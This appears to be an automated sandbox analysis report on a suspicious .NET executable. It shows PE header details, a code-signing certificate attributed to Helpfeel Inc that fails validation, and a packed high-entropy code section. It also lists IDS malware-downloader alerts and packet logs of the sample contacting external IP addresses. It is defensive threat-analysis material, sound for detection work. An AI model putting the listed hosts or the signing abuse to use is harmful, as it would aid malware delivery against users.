                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                          Authenticode Signature

                          Signature Valid:false
                          Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                          Signature Validation Error:The digital signature of the object did not verify
                          Error Number:-2146869232
                          Not Before, Not After
                          • 19/10/2023 11:33:01 19/10/2024 11:33:01
                          Subject Chain
                          • CN=Helpfeel Inc, OU=\u958b\u767a\u90e8, O=Helpfeel Inc, STREET=110-16 Goshohachiman-cho, L="Kyoto-shi, Kamigyo-ku", S=Kyoto, C=JP, OID.1.3.6.1.4.1.311.60.2.1.3=JP, SERIALNUMBER=1300-01-068185, OID.2.5.4.15=Private Organization
                          Version:3
                          Thumbprint MD5:0D966BC363CD56690E80EE36566E3C7B
                          Thumbprint SHA-1:A955D2CBD3F7D394053A3C5219A93AF13917EA0D
                          Thumbprint SHA-256:2362CABC8423B1EE01F2DE0F40197E509F8FA6DCF631E687EDB44792B241E526
                          Serial:138A5335DB02BAFDC71DC47A

                          Entrypoint Preview

                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xfee540x57.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x10eca.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x10e4000x2e78
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1120000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000xfceb40xfd000632200fd9fe2ae44dde2fc6d593776adFalse0.9346040868947628data7.920829116713707IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0x1000000x10eca0x11000a23b02ef0d6b6a2fb92680a71c17cf3cFalse0.10861385569852941data4.628626117358337IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x1120000xc0x200258158747a44ea0205d07224e98404daFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0x1001300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/m0.0999940849402579
                          RT_GROUP_ICON0x1109580x14data1.15
                          RT_VERSION0x11096c0x374data0.4242081447963801
                          RT_MANIFEST0x110ce00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                          Imports

                          DLLImport
                          mscoree.dll_CorExeMain

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                          2024-08-27T20:03:17.501424+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24971680192.168.2.6158.101.44.242
                          2024-08-27T20:03:48.769226+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349760443192.168.2.6188.114.97.3
                          2024-08-27T20:03:50.512395+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349764443192.168.2.6188.114.97.3
                          2024-08-27T20:03:39.720201+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24974280192.168.2.6158.101.44.242
                          2024-08-27T20:03:48.682864+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349759443192.168.2.6188.114.97.3
                          2024-08-27T20:03:53.734932+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349768443192.168.2.6188.114.97.3
                          2024-08-27T20:03:21.704538+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24972380192.168.2.6158.101.44.242
                          2024-08-27T20:03:41.556919+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349747443192.168.2.6188.114.97.3
                          2024-08-27T20:03:40.339749+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349745443192.168.2.6188.114.97.3
                          2024-08-27T20:03:57.238554+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349774443192.168.2.6188.114.97.3
                          2024-08-27T20:03:48.079577+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24975680192.168.2.6158.101.44.242
                          2024-08-27T20:03:20.034815+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24971680192.168.2.6158.101.44.242
                          2024-08-27T20:03:49.884414+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24976180192.168.2.6158.101.44.242
                          2024-08-27T20:03:40.985840+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24974680192.168.2.6158.101.44.242
                          2024-08-27T20:03:51.727380+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349766443192.168.2.6188.114.97.3
                          2024-08-27T20:03:24.314221+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349728443192.168.2.6188.114.97.3
                          2024-08-27T20:03:42.776244+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349751443192.168.2.6188.114.97.3
                          2024-08-27T20:03:42.188993+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24975080192.168.2.6158.101.44.242
                          2024-08-27T20:03:50.431489+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349763443192.168.2.6188.114.97.3
                          2024-08-27T20:03:46.876469+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24975680192.168.2.6158.101.44.242
                          2024-08-27T20:03:23.563943+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24972780192.168.2.6158.101.44.242
                          2024-08-27T20:03:46.548131+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349755443192.168.2.6188.114.97.3
                          2024-08-27T20:03:20.617307+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349721443192.168.2.6188.114.97.3
                          2024-08-27T20:03:22.289776+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349725443192.168.2.6188.114.97.3
                          2024-08-27T20:03:29.195692+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349736443192.168.2.6188.114.97.3
                          2024-08-27T20:03:38.688943+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24974280192.168.2.6158.101.44.242

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Aug 27, 2024 20:02:59.095247984 CEST49674443192.168.2.6173.222.162.64
                          Aug 27, 2024 20:02:59.095247984 CEST49673443192.168.2.6173.222.162.64
                          Aug 27, 2024 20:02:59.376519918 CEST49672443192.168.2.6173.222.162.64
                          Aug 27, 2024 20:03:08.704569101 CEST49674443192.168.2.6173.222.162.64
                          Aug 27, 2024 20:03:08.704570055 CEST49673443192.168.2.6173.222.162.64
                          Aug 27, 2024 20:03:08.986001968 CEST49672443192.168.2.6173.222.162.64
                          Aug 27, 2024 20:03:10.688690901 CEST44349707173.222.162.64192.168.2.6
                          Aug 27, 2024 20:03:10.688807964 CEST49707443192.168.2.6173.222.162.64
                          Aug 27, 2024 20:03:15.850888968 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:15.856358051 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:15.856440067 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:15.856900930 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:15.864444017 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:15.919702053 CEST4971680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:15.927479982 CEST8049716158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:15.927553892 CEST4971680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:15.927800894 CEST4971680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:15.936034918 CEST8049716158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:16.507905960 CEST8049716158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:16.525433064 CEST4971680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:16.529284954 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.529508114 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.529520035 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.529531002 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.529544115 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.529561996 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.529567957 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.529573917 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.529580116 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.529598951 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.529613972 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.529656887 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.530119896 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.530164957 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.533782005 CEST8049716158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:16.536309004 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.536459923 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.536473036 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.536549091 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.628201008 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.628290892 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.628308058 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.628813028 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.629050016 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.629082918 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.629225969 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.629544973 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.629570961 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.629597902 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.629625082 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.630297899 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.630325079 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.630352020 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.630356073 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.630395889 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.631236076 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.631263018 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.631311893 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.704832077 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.711199999 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.912512064 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.912595987 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.912609100 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.912695885 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.912961960 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.912974119 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.912985086 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.913044930 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.913044930 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.913914919 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.913992882 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.914062023 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.914206982 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.914218903 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.914232016 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.914253950 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.914932966 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.914948940 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.914971113 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.914995909 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.915045023 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.915688038 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.915699959 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.915730953 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.915752888 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.916594028 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.916606903 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.916704893 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.917017937 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.917030096 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.917131901 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.917464972 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.917476892 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.917488098 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.917557955 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.917557955 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.918320894 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.918349028 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.918360949 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.918489933 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.918983936 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.919001102 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.919012070 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.919348001 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.004816055 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.016016006 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.021936893 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.233051062 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.233076096 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.233088017 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.233324051 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.233937979 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.233951092 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.233961105 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.233972073 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.234050989 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.234050989 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.234683037 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.234694958 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.234704971 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.234723091 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.234735012 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.234761000 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.235616922 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.235630035 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.235640049 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.235647917 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.235652924 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.235673904 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.236468077 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.236485958 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.236499071 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.236500025 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.236511946 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.236536026 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.237351894 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.237364054 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.237374067 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.237377882 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.237387896 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.237407923 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.238441944 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.238455057 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.238468885 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.238472939 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.238481998 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.238492966 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.238502979 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.238799095 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.239080906 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.239103079 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.239115000 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.239125967 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.239156008 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.240214109 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.240232944 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.240243912 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.240246058 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.240263939 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.240276098 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.240295887 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.240295887 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.241118908 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241136074 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241147041 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.241147995 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241163015 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241174936 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.241592884 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241607904 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241619110 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241619110 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.241631031 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241641998 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241648912 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.241669893 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.242160082 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.242177010 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.242187977 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.242199898 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.242798090 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.243077040 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.243755102 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.244096994 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.244122982 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.250802040 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.324567080 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.324651957 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.324665070 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.326811075 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.332683086 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.332837105 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.332849979 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.333177090 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.333190918 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.333204031 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.333524942 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.333537102 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.333549023 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.333549976 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.333565950 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.333571911 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.334254980 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334268093 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334285021 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.334575891 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334589005 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334595919 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.334602118 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334614038 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334625006 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334635973 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334642887 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.334682941 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.334682941 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.335452080 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.335465908 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.335475922 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.335488081 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.335500956 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.335511923 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.335522890 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.335567951 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.335567951 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.336355925 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.336368084 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.336376905 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.336390972 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.336402893 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.336426020 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.336426020 CEST4971580192.168.2.6144.91.79.54
